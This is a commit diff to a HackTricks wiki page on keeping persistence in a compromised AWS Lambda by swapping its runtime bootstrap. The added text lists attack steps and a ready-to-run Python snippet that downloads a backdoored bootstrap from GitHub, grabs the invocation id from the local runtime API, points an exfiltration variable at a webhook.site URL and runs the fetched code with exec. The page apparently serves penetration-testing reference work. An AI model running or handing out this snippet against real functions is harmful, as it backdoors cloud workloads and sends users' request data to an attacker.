GITBOOK-589: change request with no subject merged in GitBook

HackTricks-wiki · Feb 29, 2024 · e90228e · e90228e
1 parent 1921087
commit e90228e
Showing 1 changed file with 28 additions and 1 deletion.
diff --git a/...s-post-exploitation/aws-lambda-post-exploitation/aws-warm-lambda-persistence.md b/...s-post-exploitation/aws-lambda-post-exploitation/aws-warm-lambda-persistence.md
@@ -39,11 +39,38 @@ This is a simple task to achieve as the code of the user is being executed by th
  * The invoke-id can be obtained from the stack of the legit **`bootstrap.py`** process using the [**inspect**](https://docs.python.org/3/library/inspect.html) python module (as [proposed here](https://github.com/twistlock/lambda-persistency-poc/blob/master/poc/switch\_runtime.py)) or just requesting it again to **`/2018-06-01/runtime/invocation/next`** (as [proposed here](https://github.com/Djkusik/serverless\_persistency\_poc/blob/master/gcp/exploit\_files/switcher.py)).
 * Execute a malicious **`boostrap.py`** which will handle the next invocations
  * For stealthiness purposes it's possible to send the lambda invocations parameters to an attackers controlled C2 and then handle the requests as usual.
- * For this attack, it's enough to get the original code of **`bootstrap.py`** from the system, add the malicious code and run it from the current lambda invocation indicating the **`invoke-id`** as parameter.
+ * For this attack, it's enough to get the original code of **`bootstrap.py`** from the system or [**github**](https://github.com/aws/aws-lambda-python-runtime-interface-client/blob/main/awslambdaric/bootstrap.py), add the malicious code and run it from the current lambda invocation.
 
 ### Attack Steps
 
+1. Find a **RCE** vulnerability.
+2. Generate a **malicious** **bootstrap** (e.g. [https://raw.githubusercontent.com/carlospolop/lambda\_bootstrap\_switcher/main/backdoored\_bootstrap.py](https://raw.githubusercontent.com/carlospolop/lambda\_bootstrap\_switcher/main/backdoored\_bootstrap.py))
+3. **Execute** the malicious bootstrap.
 
+You can easily perform these actions running:
+
+```bash
+python3 <<EOF
+import os
+import urllib3
+
+# Download backdoored bootstrap
+http = urllib3.PoolManager()
+backdoored_bootstrap_url = "https://raw.githubusercontent.com/carlospolop/lambda_bootstrap_switcher/main/backdoored_bootstrap.py"
+new_runtime = http.request('GET', backdoored_bootstrap_url).data
+
+# Get invocation id
+resp = http.request("GET", "127.0.0.1:9001/2018-06-01/runtime/invocation/next")
+invoke_id = resp.headers["Lambda-Runtime-Aws-Request-Id"]
+
+# Load new bootstrap
+os.environ['URL_EXFIL'] = "https://webhook.site/c7036f43-ce42-442f-99a6-8ab21402a7c0"
+
+exec(new_runtime)
+EOF
+```
+
+For more info check [https://github.com/carlospolop/lambda\_bootstrap\_switcher](https://github.com/carlospolop/lambda\_bootstrap\_switcher)
 
 ## References